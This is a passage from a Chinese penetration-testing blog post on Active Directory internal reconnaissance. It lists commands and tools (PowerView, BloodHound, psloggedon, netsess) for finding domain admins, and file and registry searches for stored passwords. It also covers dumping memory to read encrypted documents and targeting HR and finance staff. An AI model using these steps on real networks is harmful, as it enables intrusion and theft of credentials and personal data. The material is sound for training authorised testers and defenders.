net group <span class="token string">"Enterprise Admins"</span> /domain
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="定位域管理员-很重要"><a href="#定位域管理员-很重要" class="headerlink" title="定位域管理员 (很重要)  "></a><font color="red">定位域管理员 (很重要)  </font></h4><p>当一台机器加入域后，会默认给域管理员组赋予本地系统管理员权限</p>
<h6 id="常规定位域内管理员方法："><a href="#常规定位域内管理员方法：" class="headerlink" title="常规定位域内管理员方法："></a>常规定位域内管理员<code>方法</code>：</h6><blockquote>
<p>第二种方法使用较多</p>
</blockquote>
<ol>
<li>日志 （本地机器的管理员日志，可以使用<code>脚本</code>或<code>wevtuti</code>l导出并查看）</li>
<li>会话 （域内每个机器的等会会话，可以匿名查询，无需权限，可以使用<code>netess.exe</code>或<code>powerview</code>等工具查询）</li>
</ol>
<h6 id="常用的定位域管理员工具："><a href="#常用的定位域管理员工具：" class="headerlink" title="常用的定位域管理员工具："></a>常用的定位域管理员<code>工具</code>：</h6><p>1.psloggedon.exe        </p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># 下载地址：https://docs.microsoft.com/en-us/sysinternals/downloads/psloggedon</span>
<span class="token comment" spellcheck="true"># 查看本地登录的用户 和 通过本地计算机或远程计算机的资源登录的用户</span>
<span class="token comment" spellcheck="true"># 如果指定的是"用户名"而不是计算机名，则会搜索网上邻居的计算机，并显示该用户当前是否已经登录</span>
<span class="token comment" spellcheck="true"># 某些功能需要管理员权限</span>

psloggedon \\DC1
<span class="token comment" spellcheck="true"># - 显示支持的选项和用于输出值的单位</span>
<span class="token comment" spellcheck="true"># -l  仅显示本地登录，不显示本地和网络资源登录</span>
<span class="token comment" spellcheck="true"># -x  不显示登录时间</span>
<span class="token comment" spellcheck="true"># \\computername:    指定要列出登录信息的计算机name</span>
<span class="token comment" spellcheck="true"># username:    指定用户名</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>2.PVEFindADUser.exe      </p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># 下载地址： https://github.com/chrisdee/Tools/tree/master/AD/ADFindUsersLoggedOn</span>
<span class="token comment" spellcheck="true"># 可用于查找活动目录</span>
<span class="token comment" spellcheck="true"># 需要 .net 2.0, 且 需管理员权限</span>

PVEFindADUser.exe  <span class="token operator">&lt;</span>参数<span class="token operator">></span>
<span class="token comment" spellcheck="true"># </span>
PVEFindADUser.exe  --current   <span class="token comment" spellcheck="true"># 显示域中所有计算机上当前登录的用户</span>
PVEFindADUser.exe  --last   <span class="token comment" spellcheck="true"># 显示域中目标计算机上最后登录的用户</span>
<span class="token comment" spellcheck="true"># 参数 -noping 阻止在之前ping</span>

<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>4.netsess.exe                        </p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># 枚举工具</span>

netsess.exe  <span class="token operator">&lt;</span>参数<span class="token operator">></span>
<span class="token comment" spellcheck="true"># -f file.txt   指定要提取主机列表的文件</span>
<span class="token comment" spellcheck="true"># -e file.txt   指定要排除的主机名的文件</span>
<span class="token comment" spellcheck="true"># -o file.txt   将所有输出都重定向到指定的文件</span>
<span class="token comment" spellcheck="true"># -d domain     指定要提取主机列表的域，若没指定，则从当前域中提取主机列表</span>
<span class="token comment" spellcheck="true"># -g group      指定搜索的组名，若没指定，就从当前域中提取主机列表</span>
<span class="token comment" spellcheck="true"># -c            对已找到的共享目录/文件的访问权限进行检查</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>5.NetView.exe    </p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># 地址： https://github.com/mubix/netview</span>

<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<p>6.Nmap的NSE脚本</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># 下载地址   https://nmap.org/nsedoc/scripts/smb-enum-sessions.html</span>
smb-enum-session.nse    <span class="token comment" spellcheck="true"># 获取远程机器的登录会话,查看当前是否有用户登录</span>
smb-enum-domains.nse    <span class="token comment" spellcheck="true"># 获取主机信息、用户、可使用密码策略的用户等</span>
smb-enum-users.nse      <span class="token comment" spellcheck="true"># 如果获得的权限有限，使用这个获得更多的域用户的信息</span>
smb-enum-shares.nse     <span class="token comment" spellcheck="true"># 遍历远程主机的共享目录</span>
smb-enum-processs.nse   <span class="token comment" spellcheck="true"># 对主机的系统进程进行遍历（可以知道主机正在运行什么软件）</span>
smb-os-discovery.nse    <span class="token comment" spellcheck="true"># 收集目标的一些信息</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>7.PowerShell 中， PowerView脚本： Invoke-UserHunter   </p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># 下载地址： https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerView</span>

<span class="token comment" spellcheck="true"># Invoke-StealthUserHunter    只需要进行一次查询，就可以获取域里面的所有用户(隐蔽性高，但不一定全面)</span>

<span class="token comment" spellcheck="true"># Invoke-UserHunter 找到域内特定的用户群，接收用户名、用户列表和域组查询</span>
powershell -nop -exec bypass -Command <span class="token string">"&amp; {Import-Module .\PowerView.ps1; Invoke-UserHunter}"</span> 
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>8.Empire下<code>user_hunter</code>模块</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># 也有类似Invoke-UserHunter的模块： user_hunter   --> 用于查找域管理员登录的机器</span>
usemodule situational_awareness/network/powerview/user_hunter
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
<h4 id="查找域管理进程"><a href="#查找域管理进程" class="headerlink" title="查找域管理进程 "></a><font color="red">查找域管理进程 </font></h4><p>如果在无法立即拥有权限的系统中获得管理员进程，那么通常可以采用的方法是：在跳板机之间跳转，直至获得域管理员权限，同时进行一些分析工作，进而找到测试的路径</p>
<h6 id="a-本机检查"><a href="#a-本机检查" class="headerlink" title="a.本机检查"></a>a.本机检查</h6><p>1．获取域管理员列表 </p>
<pre class="line-numbers language-bash"><code class="language-bash">net group <span class="token string">"domain admins"</span> /domain
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>2．列出本机所有进程及进程用户 </p>
<pre class="line-numbers language-bash"><code class="language-bash">tasklist /v
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
<p>3．寻找是否有进程所有者为域管理员的进程<br>能用上面两种方法找到自然最好，但实际往往并非如此……</p>
<h6 id="b-查询域控制器的与用户会话（脚本）"><a href="#b-查询域控制器的与用户会话（脚本）" class="headerlink" title="b.查询域控制器的与用户会话（脚本）"></a>b.查询域控制器的与用户会话（脚本）</h6><ol>
<li>收集域控制器的列表<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># 可以使用LDAP查询</span>
<span class="token comment" spellcheck="true"># net</span>
net group <span class="token string">"domain Controllers"</span> /domain
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
</li>
<li>收集域管理员的列表<pre class="line-numbers language-bash"><code class="language-bash">net group <span class="token string">"domain Admins"</span> /domain
<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>
</li>
<li>收集所有活动域会话的列表 <pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># 使用Netsess.exe插叙每个域控制器，</span>
netsess -h
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
</li>
<li>将域管理员列表与活动会话列表交叉引用，以确定哪些IP地址具有活动域令牌<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true">#</span>
<span class="token comment" spellcheck="true">#也有其他的的GDA脚本(Get Domain Admins)  https://github.com/nullbind/Other-Projects/tree/master/GDA</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>
</li>
</ol>
<p>如果没有会话： 隔一段时间，等着有会话 / 脚本自动隔一段时间运行</p>
<h6 id="c-扫描远程系统上运行的任务"><a href="#c-扫描远程系统上运行的任务" class="headerlink" title="c.扫描远程系统上运行的任务"></a>c.扫描远程系统上运行的任务</h6><p>前提：使用了共享<br><img src="http://image.xpshuai.cn/20200308144440441_12568.png"></p>
<h6 id="d-扫描远程系统上NetBISO信息"><a href="#d-扫描远程系统上NetBISO信息" class="headerlink" title="d.扫描远程系统上NetBISO信息"></a>d.扫描远程系统上NetBISO信息</h6><p>NetBISO是一个协议，端口137,138,139之类<br>也可使用工具：<code>nbtscan</code><br><img src="http://image.xpshuai.cn/20200308144903911_31072.png"></p>
<h4 id="模拟域管理员的方法"><a href="#模拟域管理员的方法" class="headerlink" title=" 模拟域管理员的方法"></a><font color="red"> 模拟域管理员的方法</font></h4><p>如果已经拥有了meterpreter会话，就可以使用<code>Incognito</code>来模拟域管理者添加一个域管理员，通过尝试遍历系统中所有可用的授权令牌来添加新的管理员<br>第四章见</p>
<h4 id="利用-PowerShell-收集域信息"><a href="#利用-PowerShell-收集域信息" class="headerlink" title=" 利用 PowerShell 收集域信息"></a><font color="red"> 利用 PowerShell 收集域信息</font></h4><h6 id="PowerShell"><a href="#PowerShell" class="headerlink" title="PowerShell"></a>PowerShell</h6><p>PowerShell常用的执行权限共有四种，具体如下。</p>
<pre><code>Restricted：默认设置，不允许执行任何脚本。
Allsigned：只能运行经过证书验证的脚本。
Unrestricted：权限最高，可以执行任意脚本。
RemoteSigned：本地脚本无限制，但是对来自网络的脚本必须经过签名。

在 PowerShell 中输入“Get-ExecutionPolicy”，看到为默认 Restricted 权限
</code></pre><h6 id="PowerView"><a href="#PowerView" class="headerlink" title="PowerView"></a>PowerView</h6><blockquote>
<p>是一款依赖 PowerShell 和 WMI 对内网域情况进行查询的常用渗透脚本，PowerView 集成在<code>PowerSploit</code> 工具包中<br><a href="https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1" target="_blank" rel="noopener">下载地址</a></p>
</blockquote>
<p>BypassUAC 最直接的办法： <code>-ExexutionPolicy ByPass</code></p>
<p><strong>PowerView 中的常用命令</strong></p>
<pre class="line-numbers language-powershell"><code class="language-powershell"><span class="token comment" spellcheck="true"># 先 Import-Moudle .\PowerView.ps1</span>

Get<span class="token operator">-</span>NetDomain    <span class="token comment" spellcheck="true">#获取当前用户所在的域名称</span>
Get<span class="token operator">-</span>NetUser    <span class="token comment" spellcheck="true">#返回所有用户的详细信息</span>
Get<span class="token operator">-</span>NetDomainController    <span class="token comment" spellcheck="true">#获取所有域控制器</span>
Get<span class="token operator">-</span>NetComputer    <span class="token comment" spellcheck="true">#获取所有域内机器的详细信息</span>
Get<span class="token operator">-</span>NetOU    <span class="token comment" spellcheck="true">#获取域中的 OU 信息</span>
Get<span class="token operator">-</span>NetGroup    <span class="token comment" spellcheck="true">#获取所有域内组和组成员信息</span>
Get<span class="token operator">-</span>NetFileServer    <span class="token comment" spellcheck="true">#根据 SPN 获取当前域使用的文件服务器</span>
Get<span class="token operator">-</span>NetShare   <span class="token comment" spellcheck="true">#获取当前域内所有网络共享</span>
Get<span class="token operator">-</span>NetSession    <span class="token comment" spellcheck="true">#获取在指定服务器存在的会话信息</span>
Get<span class="token operator">-</span>NetRDPSession   <span class="token comment" spellcheck="true"># 获取在指定服务器存在的远程连接信息</span>
Get<span class="token operator">-</span>NetProcess    <span class="token comment" spellcheck="true">#获取远程主机的进程信息</span>
Get<span class="token operator">-</span>UserEvent    <span class="token comment" spellcheck="true">#获取指定用户的日志信息</span>
Get<span class="token operator">-</span>ADObject    <span class="token comment" spellcheck="true">#获取活动目录的对象信息</span>
Get<span class="token operator">-</span>NetGPO    <span class="token comment" spellcheck="true">#获取域所有组策略对象</span>
Get<span class="token operator">-</span>DomainPolicy   <span class="token comment" spellcheck="true"># 获取域默认或域控制器策略</span>
Invoke<span class="token operator">-</span>UserHunter    <span class="token comment" spellcheck="true">#用于获取域用户登录计算机及该用户是否有本地管理权限</span>
Invoke<span class="token operator">-</span>ProcessHunter    <span class="token comment" spellcheck="true">#查找域内所有机器进程用于找到某特定用户</span>
Invoke<span class="token operator">-</span>UserEventHunter    <span class="token comment" spellcheck="true">#根据用户日志获取某域用户登录过哪些域机器</span>

<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="域分析工具-BloodHound"><a href="#域分析工具-BloodHound" class="headerlink" title=" 域分析工具 BloodHound "></a><font color="red"> 域分析工具 BloodHound </font></h4><p>通过图与线的方式，把域内信息直观的展示</p>
<p><a href="https://github.com/BloodHoundAD/BloodHound/releases/download/2.0.4/BloodHound-win32-x64.zip" target="_blank" rel="noopener">https://github.com/BloodHoundAD/BloodHound/releases/download/2.0.4/BloodHound-win32-x64.zip</a></p>
<h6 id="配置环境"><a href="#配置环境" class="headerlink" title="配置环境"></a>配置环境</h6><p>1.下载安装jdk并配置<br>2.下载安装Neo4j（Neo4j Server -&gt; Community Server-&gt;Windows）<br>3.启动Neo4j数据库服务端(neo4j-&gt;非关系型数据库.   进入解压后的bin，输入命令<code>ndo4j.bat console</code>启动服务)<br>4.浏览器输入：127.0.0.1:7474/browser，用户名密码默认<code>neo4j</code><br>4.下载BloodHound, 解压后双击exe启动， 输入<code>bolt://localhost:7687</code>和账户密码，就安装好了</p>
<h6 id="使用"><a href="#使用" class="headerlink" title="使用"></a>使用</h6><p>主界面按钮和选项描述：<br>……</p>
<p><strong>采集数据</strong></p>
<ul>
<li>哪些用户登录了哪些机器</li>
<li>哪些用户拥有管理员权限</li>
<li>那些用户和组属于哪些组</li>
</ul>
<p>BloodHound采集需依赖PowerView.ps1的BloodHound：<br>BloodHound分为两部分：<br>            1.PowerShell采集器脚本(<a href="https://github.com/BloodHoundAD/BloodHound/blob/master/Ingestors/SharpHound.ps1" target="_blank" rel="noopener">SharpHound.ps1</a>)<br>            2.可执行文件SharpHound.exe</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token comment" spellcheck="true"># 使用SharpHound.exe采集域内信息</span>
把SharpHound.exe复制到目标机器
sh.exe -c all
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p><strong>导入数据</strong><br>在当前目录下，会生成<code></code>xxx_BloodHound.zip`压缩包<br>可以把压缩文件放到界面上节点信息以外的任意位置</p>
<p><strong>查询信息</strong><br>主界面左上角的查询<code>Queries</code>, 进入模块，可以看到预定义的常用查询条件<br><img src="http://image.xpshuai.cn/20200507194413982_1350438555.png"></p>
<p>按住<code>ctrl</code>键，可以循环显示； 在其图标上按住鼠标左键可以移动位置</p>
<h4 id="敏感数据的防护"><a href="#敏感数据的防护" class="headerlink" title=" 敏感数据的防护 "></a><font color="red"> 敏感数据的防护 </font></h4><blockquote>
<p>价值比较高的东西基本上是全部在内网的</p>
</blockquote>
<h6 id="资料-数据-文件的定位流程"><a href="#资料-数据-文件的定位流程" class="headerlink" title="资料/数据/文件的定位流程"></a>资料/数据/文件的定位流程</h6><ol>
<li>定位内部人事组织结构。</li>
<li>在内部人事组织中寻找需要监视的相关人员。</li>
<li>定位相关人员的机器。</li>
<li>监视相关人工作时存放文档的位置。</li>
<li>列出存放文档服务器的目录。</li>
</ol>
<h6 id="定位内部人事组织结构"><a href="#定位内部人事组织结构" class="headerlink" title="定位内部人事组织结构"></a>定位内部人事组织结构</h6><p><strong>1. 人事组织结构图</strong><br>类似公司结构图可以在目标的外部站点(类如首页<code>“关于我们”</code> )和网上暴露的<br>信息(类如发表在<code>招聘网的各类岗位名称</code>)来分析,或者在<code>内网电脑中寻找</code>类似的人<br>事组织结构图, 再<code>结合分析人事资料里相关员工资料与域内用户名或者用户组的对应
关系</code>, 可以很快定位到你需要寻找的人员使用的机器</p>
<p><strong>2. 人力资源主管个人电脑</strong><br>在内网中通过上述种种方法定位到人力资源主管个人机器,通常单位人力资源主<br>管电脑中会存在公司所有人员的身份信息及相关材料,寻找到人力资源主管个人机器<br>后在其电脑中寻找公司人力资源相关文档得存放位置,然后从人力资源文档中寻找公<br>司相关人员信息,直至收集到你所需要的材料。</p>
<ol start="3">
<li><code>net group /domain</code><br>可以查询域内所有用户组的信息, 同样可以利用该命令来定位公司内部人事结构<br><img src="http://image.xpshuai.cn/20200506224521447_1788866667.png"><br>除了内置重点组外, <code>自建的域组</code>需要特别关注<pre class="line-numbers language-bash"><code class="language-bash"><span class="token punctuation">(</span>1<span class="token punctuation">)</span>IT组/研发组: 他们掌握了大量的内网密码,数据库密码等。
<span class="token punctuation">(</span>2<span class="token punctuation">)</span>秘书组: 他们掌握着大量的目标机构的内部传达文件和资料,为信息分析业务提供信息。
<span class="token punctuation">(</span>3<span class="token punctuation">)</span>财务组: 他们掌握着目标机构大量的资金往来与目标企业的规划发展,并且可以通过资金表,来判断出目标组织的整体架构。
<span class="token punctuation">(</span>4<span class="token punctuation">)</span>CXX组: 如ceo cto coo等,不同的组织名字不同,如部长、厂长、经理等,会拥有目标机构的机密信息
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
</li>
</ol>
<h6 id="重点核心业务机器及敏感信息防护"><a href="#重点核心业务机器及敏感信息防护" class="headerlink" title="重点核心业务机器及敏感信息防护"></a>重点核心业务机器及敏感信息防护</h6><blockquote>
<p>重点核心业务机器是渗透测试人员通常比较关心的机器,因此需要做好相应的防护措施。</p>
</blockquote>
<p><strong>1.核心业务机器</strong></p>
<pre class="line-numbers language-bash"><code class="language-bash">- 高管/系统管理员/财务/人事/业务人员的个人计算机。
- 产品管理系统服务器<span class="token punctuation">(</span>仓库管理系统<span class="token punctuation">)</span>
- OA 办公系统服务器。
- 财务应用系统服务器。
- 核心产品源码服务器<span class="token punctuation">(</span>对于 IT 公司,会架设自己的 SVN 或者 GIT 服务器<span class="token punctuation">)</span>
- 数据库服务器。
- 文件服务器/共享服务器。
- 邮件服务器。
- 网络监控系统服务器。
- 其他服务器<span class="token punctuation">(</span>分公司、工厂<span class="token punctuation">)</span>
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p><strong>2.各类敏感文件信息</strong></p>
<pre class="line-numbers language-bash"><code class="language-bash">- 站点源码备份文件、数据库备份文件、配置文件备份等<span class="token punctuation">(</span>后缀 XX.zip,XX.sql 等<span class="token punctuation">)</span>
- 各类数据库的 Web 管理入口,如 phpmyadmin、adminer 等。
- 浏览器密码和浏览器 cookie<span class="token punctuation">(</span>IE、Chrome、Firefox<span class="token punctuation">)</span>
- 其他用户会话、3389 和 ipc$连接记录、各用户回收站的信息等。
- Windows 无线密码。
- 目标内部的各种账号和密码信息,包括邮箱、VPN、FTP、TeamView 等。
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h6 id="应用与文件形式的信息收集"><a href="#应用与文件形式的信息收集" class="headerlink" title="应用与文件形式的信息收集"></a>应用与文件形式的信息收集</h6><p>说白了就是翻文件（包括一些应用的配置文件、敏感文件、密码、远程连接、员工账号、电子邮箱等）</p>
<p>不管什么途径获得的内网机器,首先需要知道的就是这台机器所属人员的职位、权利,通常一个高权利的人他在内网的权限比一般员工要高很多,他的电脑内也会有很多重要的、敏感的个人或公司内部文件。</p>
<p>用户在内网中工作时,建议不要将一些特别重要的资料放在公开的计算机中,必要时一定要对 Office 文档进行加密,密码也不要太过于简单</p>
<p><strong>常用搜索：</strong><br>1.搜索指定含有任意多关键字的文件名</p>
<pre class="line-numbers language-bash"><code class="language-bash"><span class="token function">dir</span> c:\*.doc /s
<span class="token function">dir</span> /b/s password.txt
<span class="token function">dir</span> /b/s config.*dir /s *pass* <span class="token operator">==</span> *cred* <span class="token operator">==</span> *vnc* <span class="token operator">==</span>*.config*
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span></span></code></pre>
<p>2.搜索文件名为password.txt/xml/ini的文件,这个操作可能造成大量的输出</p>
<pre><code>findstr /si password *.xml *.ini *.txt
</code></pre><p>3.搜索带有关键词的注册表项,下例中是查询的关键词是 “password”的命令</p>
<pre><code>reg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /s
</code></pre><p>4.对于加密office办公软件</p>
<pre class="line-numbers language-bash"><code class="language-bash">如果是低版本如2003的话,可以在百度搜一些网上的破解软件进行破解。

如果是高版本的话,可以在目标用户打开文件时使用微软SysinternalsSuite套装中
的抓取dump的工具-procdump来抓取内存dump,然后用内存查看器直接查看文件内容。
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<h4 id="分析域内网段划分情况及拓扑结构"><a href="#分析域内网段划分情况及拓扑结构" class="headerlink" title=" 分析域内网段划分情况及拓扑结构 "></a><font color="red"> 分析域内网段划分情况及拓扑结构 </font></h4><h6 id="目标主机基本架构的判断"><a href="#目标主机基本架构的判断" class="headerlink" title="目标主机基本架构的判断"></a>目标主机基本架构的判断</h6><p>常见的 Web 架构：</p>
<pre class="line-numbers language-bash"><code class="language-bash">- ASP + Access + IIS 5.0/6.0 + Windows Sever 2003
- ASPX + MSSQL + IIS 7.0/7.5 + Windows Sever 2008
- PHP + MySQL + IIS
- PHP + MySQL + Apache
- PHP + MySQL + Ngnix
- JSP + MySQL + Ngnix
- JSP + MSSQL + Tomcat
- JSP + Oracle + Tomcat
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h6 id="域内网段划分信息"><a href="#域内网段划分信息" class="headerlink" title="域内网段划分信息"></a>域内网段划分信息</h6><p>内网的环境判断,首先需要分析下内网IP分布情况,一般可以通过内网中路由器、交换机等设备、snmp、弱口令等来获取内网网络拓扑或DNS域传送信息泄漏,另外一般大公司都会有内部网站,也可通过内部网站公开内容链接找出部门ip段。</p>
<p>分析出内部网络是怎么划分的?是按照部门划分的网络段?还是按照楼层?还是<br>按照地区?通常内网可分为DMZ区、办公区和核心区(生产区),了解整个内网的网<br>络分布和组成,也有助于我们寻找内网核心业务。</p>
<p>1.DMZ 区</p>
<pre class="line-numbers language-bash"><code class="language-bash">在实际的渗透测试中,大多数情况下,在外围 Web 中拿到的权限在 DMZ 区。这个区域不属
于严格意义上的内网。如果 DMZ 区域访问控制策略配置合理,DMZ 区会处在内网区能够访问
DMZ 区而 DMZ 区访问不了内网区的情况下,相关知识在第 1 章中已经详细讲解过,此处不再重
复。
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>
<p>2.办公区</p>
<pre class="line-numbers language-bash"><code class="language-bash">办公区,顾名思义,是指公司员工日常的工作区。办公区的安全防护水平一般不是高,基本
防护机制大多为杀毒软件或主机入侵检测产品。在实际应用中,攻击者在获取权限后,利用内网
信任关系,很容易扩大攻击面。一般情况下,攻击者很少会直接到达办公区。攻击者如果想进入
办公区,可能会使用鱼叉攻击、水坑攻击或者社会工程学等手段。

办公区按照系统可分为： OA 系统、邮件系统、财务系统、文件共享系统、域控、企业版杀毒
系统、内部应用监控系统、运维管理系统等,按照网络段可分为域管理网段、内部服务器系统网
段、各部门分区网段等。
按照网络段可分为:域管理网段、内部服务器系统网段、各部门分区网段等。
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<p>3.核心区</p>
<pre class="line-numbers language-bash"><code class="language-bash">核心区一般存放企业最重要的数据、文档等信息资产,如域控制器、核心生产机器等,安全
设置也最为严格。根据目标开展的业务不同,相关服务器可能存在于不同的网段上。通过分析服
务器上运行的服务和进程,可以推断出目标主机使用的运维监控管理系统和安全防护系。在内网
中横向移动时,会优先查找这些主机。

核心区按照系统可分为业务系统、运维监控系
按照网络段可分为:各不同的业务网段、运维监控网段、安全管理网段等。
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>
<h6 id="多层域结构分析"><a href="#多层域结构分析" class="headerlink" title="多层域结构分析"></a>多层域结构分析</h6><p>我们需要先分析出当前内网是否存在多层域、现在这计算机所在的域是几级子域、这个子域的域控制器及根域的域控制器是哪些、其他域的域控制器是哪些、域之间是否存在域信任关系等。</p>
<h6 id="绘制内网拓扑图"><a href="#绘制内网拓扑图" class="headerlink" title="绘制内网拓扑图"></a>绘制内网拓扑图</h6><hr>
<h6 id="基础信息搜集-思维图"><a href="#基础信息搜集-思维图" class="headerlink" title="基础信息搜集- 思维图"></a>基础信息搜集- 思维图</h6><p><img src="http://image.xpshuai.cn/内网信息搜集-思维图.Jpeg"></p>
<script>
        document.querySelectorAll('.github-emoji')
          .forEach(el => {
            if (!el.dataset.src) { return; }
            const img = document.createElement('img');
            img.style = 'display:none !important;';
            img.src = el.dataset.src;
            img.addEventListener('error', () => {
              img.remove();
              el.style.color = 'inherit';
              el.style.backgroundImage = 'none';
              el.style.background = 'none';
            });
            img.addEventListener('load', () => {
              img.remove();
            });
            document.body.appendChild(img);
          });
      </script>
            </div>
            <hr/>

            

    <div class="reprint" id="reprint-statement">
        
            <div class="reprint__author">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-user">
                        文章作者:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://www.xpshuai.cn" rel="external nofollow noreferrer">浮生</a>
                </span>
            </div>
            <div class="reprint__type">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-link">
                        文章链接:
                    </i>
                </span>
                <span class="reprint-info">
                    <a href="http://www.xpshuai.cn/posts/54461/">http://www.xpshuai.cn/posts/54461/</a>
                </span>
            </div>
            <div class="reprint__notice">
                <span class="reprint-meta" style="font-weight: bold;">
                    <i class="fas fa-copyright">
                        版权声明:
                    </i>
                </span>
                <span class="reprint-info">
                    本博客所有文章除特別声明外，均采用
                    <a href="https://creativecommons.org/licenses/by/4.0/deed.zh" rel="external nofollow noreferrer" target="_blank">CC BY 4.0</a>
                    许可协议。转载请注明来源
                    <a href="http://www.xpshuai.cn" target="_blank">浮生</a>
                    !
                </span>
            </div>
        
    </div>

    <script async defer>
      document.addEventListener("copy", function (e) {
        let toastHTML = '<span>复制成功，请遵循本文的转载规则</span><button class="btn-flat toast-action" onclick="navToReprintStatement()" style="font-size: smaller">查看</a>';
        M.toast({html: toastHTML})
      });

      function navToReprintStatement() {
        $("html, body").animate({scrollTop: $("#reprint-statement").offset().top - 80}, 800);
      }
    </script>



            <div class="tag_share" style="display: block;">
                <div class="post-meta__tag-list" style="display: inline-block;">
                    
                        <div class="article-tag">
                            
                                <a href="/tags/渗透测试/">
                                    <span class="chip bg-color">渗透测试</span>
                                </a>
                            
                                <a href="/tags/信息搜集/">
                                    <span class="chip bg-color">信息搜集</span>
                                </a>
                            
                                <a href="/tags/内网/">
                                    <span class="chip bg-color">内网</span>
                                </a>
                            
                        </div>
                    
                </div>
                <div class="post_share" style="zoom: 80%; width: fit-content; display: inline-block; float: right; margin: -0.15rem 0;">
                    <link rel="stylesheet" type="text/css" href="/libs/share/css/share.min.css">
<div id="article-share">

    
    <div class="social-share" data-sites="twitter,facebook,google,qq,qzone,wechat,weibo,douban,linkedin" data-wechat-qrcode-helper="<p>微信扫一扫即可分享！</p>"></div>
    <script src="/libs/share/js/social-share.min.js"></script>
    

    

</div>

                </div>
            </div>
            
                <style>
    #reward {
        margin: 40px 0;
        text-align: center;
    }

    #reward .reward-link {
        font-size: 1.4rem;
        line-height: 38px;
    }

    #reward .btn-floating:hover {
        box-shadow: 0 6px 12px rgba(0, 0, 0, 0.2), 0 5px 15px rgba(0, 0, 0, 0.2);
    }

    #rewardModal {
        width: 320px;
        height: 350px;
    }

    #rewardModal .reward-title {
        margin: 15px auto;
        padding-bottom: 5px;
    }

    #rewardModal .modal-content {
        padding: 10px;
    }

    #rewardModal .close {
        position: absolute;
        right: 15px;
        top: 15px;
        color: rgba(0, 0, 0, 0.5);
        font-size: 1.3rem;
        line-height: 20px;
        cursor: pointer;
    }

    #rewardModal .close:hover {
        color: #ef5350;
        transform: scale(1.3);
        -moz-transform:scale(1.3);
        -webkit-transform:scale(1.3);
        -o-transform:scale(1.3);
    }

    #rewardModal .reward-tabs {
        margin: 0 auto;
        width: 210px;
    }

    .reward-tabs .tabs {
        height: 38px;
        margin: 10px auto;
        padding-left: 0;
    }

    .reward-content ul {
        padding-left: 0 !important;
    }

    .reward-tabs .tabs .tab {
        height: 38px;
        line-height: 38px;
    }

    .reward-tabs .tab a {
        color: #fff;
        background-color: #ccc;
    }

    .reward-tabs .tab a:hover {
        background-color: #ccc;
        color: #fff;
    }

    .reward-tabs .wechat-tab .active {
        color: #fff !important;
        background-color: #22AB38 !important;
    }

    .reward-tabs .alipay-tab .active {
        color: #fff !important;
        background-color: #019FE8 !important;
    }

    .reward-tabs .reward-img {
        width: 210px;
        height: 210px;
    }
</style>

<div id="reward">
    <a href="#rewardModal" class="reward-link modal-trigger btn-floating btn-medium waves-effect waves-light red">赏</a>

    <!-- Modal Structure -->
    <div id="rewardModal" class="modal">
        <div class="modal-content">
